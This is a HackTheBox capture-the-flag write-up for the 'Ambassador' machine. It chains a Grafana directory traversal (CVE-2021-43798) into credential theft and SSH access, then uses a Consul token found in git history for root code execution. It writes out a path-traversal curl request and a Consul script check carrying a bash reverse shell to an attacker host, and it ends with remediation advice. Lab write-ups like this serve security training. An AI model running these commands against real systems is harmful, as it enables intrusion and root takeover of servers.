HTB: ambassador Writeup

Machine Information

Machine Rating

⭐⭐⭐⭐☆ (7.0/10)

Difficulty Assessment:

• Enumeration: ⭐⭐⭐⭐☆
• Exploitation: ⭐⭐⭐☆☆
• Real-world: ⭐⭐⭐⭐☆
• Privilege Escalation: ⭐⭐⭐⭐☆

Summary

Ambassador is a Medium-difficulty Linux machine featuring multiple services with critical vulnerabilities. The exploitation path begins with discovering a Grafana instance vulnerable to directory traversal, extracting credentials and sensitive information from its SQLite database. This leads to SSH access as the developer user. Post-exploitation enumeration reveals git history containing a hardcoded Consul authentication token, which can be leveraged via the Consul API to achieve remote code execution as root.

TL;DR: Grafana CVE-2021-43798 → Extract credentials → SSH as developer → Git history reveals Consul token → Consul RCE → Root

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.x.x

Results:

Service Enumeration

Key Findings:

• Grafana running on port 3000 (redirects to /login)
• MySQL database on port 3306
• Consul service discovery on port 8500
• Django application in /opt/my-app/whackywidget/

Initial Foothold

Grafana Directory Traversal (CVE-2021-43798)

Vulnerability: Grafana 8.3.0 contains a directory traversal vulnerability allowing unauthenticated arbitrary file read.

Discovery: Searchsploit identified the exploit: “Grafana 8.3.0 - Directory Traversal and Arbitrary File Read” (exploit ID: 50581.py).

# Exploit the directory traversal vulnerability
# This allows reading files outside the intended directory without authentication
python3 50581.py http://10.129.x.x:3000

Grafana Database Extraction

The exploit targets Grafana’s API endpoint and can extract the SQLite database (grafana.db):

# Download grafana.db via directory traversal
curl -s "http://10.129.x.x:3000/public/plugins/../../../../../../../../var/lib/grafana/grafana.db"

Database Analysis:

sqlite3 grafana.db
# Key tables: dashboard, org_user, org, data_source
# Contains: usernames, password hashes, authentication credentials, datasource credentials

The grafana.db file contains sensitive data including organization users, API tokens, and potentially cleartext credentials stored in datasource configurations.

User Compromise

SSH Access as Developer

Credential Source: Credentials extracted from Grafana database analysis or configuration.

ssh developer@10.129.x.x
# Password obtained from Grafana database or related files

Post-Exploitation Enumeration

Once inside the system:

ps aux
# Reveals running processes:
# - consul agent running as root (/usr/bin/consul agent -config-dir=/)
# - mysql running
# - grafana-server
# - apache
# - sshd
# - cron

# Discover application directory
ls -la /opt/my-app/
cd /opt/my-app/whackywidget/  # Django 4.0.3 project

Git History Analysis

A critical discovery in the application git history:

cd /opt/my-app
git log --oneline
git show <commit-hash>
# or
git diff HEAD~5..HEAD

Exposed Secret: An older commit contains a hardcoded Consul authentication token used in deployment scripts:

consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD

Consul Token: bb03b43b-1d81-d62b-24b5-39540ee469b5

Django Configuration

Additional sensitive information from Django settings:

SECRET_KEY = 'django-insecure--lqw3fdyxw(28h#0(w8_te*wm*6ppl@g!ttcpo^m-ig!qtqy!l'

Privilege Escalation

Consul API Exploitation

Vulnerability: Consul HTTP API with discovered authentication token allows privileged operations. The Consul agent is running as root with both EnableRemoteScriptChecks and EnableLocalScriptChecks enabled, allowing remote code execution.

Verification:

curl --header "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" \
  http://localhost:8500/v1/agent/self

Response reveals: Consul v1.13.2, security checks enabled.

Consul Service Registration with Script Check

Consul allows registering services with health checks that execute scripts. With the valid token, we can create a malicious service registration:

curl -X PUT \
  --header "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" \
  -d '{
    "ID": "rce-check",
    "Name": "rce-service",
    "Script": "/bin/bash -c \"bash -i >& /dev/tcp/10.10.x.x/PORT 0>&1\"",
    "Interval": "10s"
  }' \
  http://localhost:8500/v1/agent/service/register

This registers a service with a script check that will execute as the root user (since the Consul agent runs as root).

Alternative: Consul KV Store Manipulation

With the valid token, we can also place malicious code in the KV store and reference it via application configurations or other services to achieve RCE.

Root Access Achieved

Once the script check executes or a reverse shell is established, code runs with root privileges:

id
# uid=0(root) gid=0(root) groups=0(root)

cat /root/root.txt

Attack Chain Summary

graph TD
    A["Recon: Port scan<br/>22 SSH, 80 HTTP, 3000 Grafana<br/>3306 MySQL, 8500 Consul"] --> B["Grafana CVE-2021-43798<br/>Directory Traversal"]
    B --> C["Extract grafana.db<br/>SQLite database"]
    C --> D["Obtain credentials from<br/>database/config files"]
    D --> E["SSH access as developer"]
    E --> F["Enumerate processes<br/>Find Consul running as root"]
    F --> G["Git history analysis<br/>Discover Consul token"]
    G --> H["Consul API access<br/>bb03b43b-1d81-d62b-24b5-39540ee469b5"]
    H --> I["Service registration with<br/>malicious script check"]
    I --> J["Remote Code Execution<br/>as root"]

Tools Used

Key Learnings

1. Database Security: Default or accessible database files (like Grafana’s SQLite DB) often contain sensitive credentials and authentication tokens that shouldn’t be world-readable.

2. Git History Secrets: Never commit sensitive credentials (API tokens, passwords, SSH keys) to git repositories. Use .gitignore and tools like git-secrets to prevent this.

3. Service Misconfigurations: When services run as privileged users (root), any ability to interact with them (via tokens or APIs) can directly lead to privilege escalation.

4. Consul Security: Consul tokens should be treated as secrets equivalent to passwords. Script checks should be carefully validated and only allow trusted scripts, or disabled entirely if not needed.

5. Defense in Depth: This chain required multiple steps (CVE exploitation → database analysis → credential reuse → token discovery → API exploitation). Proper access controls at each step would have prevented compromise.

Remediation

1. Patch Grafana: Upgrade to a patched version that addresses CVE-2021-43798.
2. Restrict Grafana Access: Require authentication before accessing Grafana or use network-level access controls.
3. Secure Consul Configuration:
   • Disable script checks if not required
   • Use ACLs properly and rotate tokens regularly
   • Never commit tokens to repositories
4. Database Hardening: Restrict file permissions on SQLite databases and other sensitive data stores.
5. Credential Management: Use secret management tools (HashiCorp Vault, AWS Secrets Manager) instead of hardcoding credentials.
6. Git Security: Implement pre-commit hooks to prevent secret commits; audit git history for exposed secrets.

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Medium #CVE-2021-43798 #Grafana #Consul #Privilege-Escalation